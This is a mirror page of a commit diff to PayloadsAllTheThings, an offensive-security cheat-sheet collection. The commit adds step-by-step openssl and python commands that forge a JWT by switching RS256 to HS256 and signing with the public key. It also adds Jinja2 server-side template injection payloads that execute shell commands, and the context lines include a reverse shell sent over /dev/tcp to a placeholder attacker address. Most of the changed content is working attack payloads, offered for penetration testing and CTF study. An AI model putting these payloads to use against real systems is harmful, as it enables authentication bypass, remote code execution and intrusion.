mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-12 22:33:00 +00:00
JWT RS256 to HS256 using pubkey to generate a signature
This commit is contained in:
parent
6cecb8fa7a
commit
05054af343
3 changed files with 52 additions and 7 deletions
|
@ -4,10 +4,15 @@
|
|||
|
||||
## Summary
|
||||
|
||||
- JWT Format
|
||||
- JWT Signature - None algorithm
|
||||
- JWT Signature - RS256 to HS256
|
||||
- Breaking JWT's secret
|
||||
- [Tools](#tools)
|
||||
- [JWT Format](#jwt-format)
|
||||
- [JWT Signature - None algorithm](#jwt-signature---none-algorithm)
|
||||
- [JWT Signature - RS256 to HS256](#jwt-signature---rs256-to-hs256)
|
||||
- [Breaking JWT's secret](#breaking-jwts-secret)
|
||||
- [JWT Tool](#jwt-tool)
|
||||
- [JWT cracker](#jwt-cracker)
|
||||
- [Hashcat](#hashcat)
|
||||
- [References](#references)
|
||||
|
||||
## Tools
|
||||
|
||||
|
@ -118,10 +123,40 @@ print public
|
|||
print jwt.encode({"data":"test"}, key=public, algorithm='HS256')
|
||||
```
|
||||
|
||||
Note: This behavior is fixed in the python library and will return this error `jwt.exceptions.InvalidKeyError: The specified key is an asymmetric key or x509 certificate and should not be used as an HMAC secret.`. You need to install the following version
|
||||
:warning: This behavior is fixed in the python library and will return this error `jwt.exceptions.InvalidKeyError: The specified key is an asymmetric key or x509 certificate and should not be used as an HMAC secret.`. You need to install the following version
|
||||
|
||||
`pip install pyjwt==0.4.3`.
|
||||
|
||||
Here are the steps to edit an RS256 JWT token into an HS256
|
||||
|
||||
1. Convert our public key (key.pem) into HEX with this command.
|
||||
|
||||
```powershell
|
||||
$ cat key.pem | xxd -p | tr -d "\\n"
|
||||
2d2d2d2d2d424547494e20505[STRIPPED]592d2d2d2d2d0a
|
||||
```
|
||||
|
||||
2. Generate HMAC signature by supplying our public key as ASCII hex and with our token previously edited.
|
||||
|
||||
```powershell
|
||||
$ echo -n "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IjIzIiwidXNlcm5hbWUiOiJ2aXNpdG9yIiwicm9sZSI6IjEifQ" | openssl dgst -sha256 -mac HMAC -macopt hexkey:2d2d2d2d2d424547494e20505[STRIPPED]592d2d2d2d2d0a
|
||||
|
||||
(stdin)= 8f421b351eb61ff226df88d526a7e9b9bb7b8239688c1f862f261a0c588910e0
|
||||
```
|
||||
|
||||
3. Convert signature (Hex to "base64 URL")
|
||||
|
||||
```powershell
|
||||
$ python2 -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('8f421b351eb61ff226df88d526a7e9b9bb7b8239688c1f862f261a0c588910e0')).replace('=','')\")"
|
||||
```
|
||||
|
||||
4. Add signature to edited payload
|
||||
|
||||
```powershell
|
||||
[HEADER EDITED RS256 TO HS256].[DATA EDITED].[SIGNATURE]
|
||||
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IjIzIiwidXNlcm5hbWUiOiJ2aXNpdG9yIiwicm9sZSI6IjEifQ.j0IbNR62H_Im34jVJqfpubt7gjlojB-GLyYaDFiJEOA
|
||||
```
|
||||
|
||||
## Breaking JWT's secret
|
||||
|
||||
Encode/Decode JWT with the secret.
|
||||
|
@ -231,4 +266,5 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
|
|||
- [Simple JWT hacking - @b1ack_h00d](https://medium.com/@blackhood/simple-jwt-hacking-73870a976750)
|
||||
- [Attacking JWT authentication - Sep 28, 2016 - Sjoerd Langkemper](https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/)
|
||||
- [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9)
|
||||
- [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
|
||||
- [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
|
||||
- [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/)
|
|
@ -48,6 +48,7 @@
|
|||
|
||||
- [SSRFmap - https://github.com/swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap)
|
||||
- [Gopherus - https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus)
|
||||
- [See-SURF - https://github.com/In3tinct/See-SURF](https://github.com/In3tinct/See-SURF)
|
||||
|
||||
## Payloads with localhost
|
||||
|
||||
|
|
|
@ -254,7 +254,14 @@ Listen for connexion
|
|||
nv -lnvp 8000
|
||||
```
|
||||
|
||||
Inject this template
|
||||
Exploit the SSTI by calling subprocess.Popen.
|
||||
:warning: the number 396 will vary depending of the application.
|
||||
|
||||
```python
|
||||
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
|
||||
```
|
||||
|
||||
Exploit the SSTI by writing an evil file.
|
||||
|
||||
```python
|
||||
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # evil config
|
||||
|
@ -262,6 +269,7 @@ Inject this template
|
|||
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
|
||||
```
|
||||
|
||||
|
||||
### Filter bypass
|
||||
|
||||
```python
|
||||
|
|
Loading…
Reference in a new issue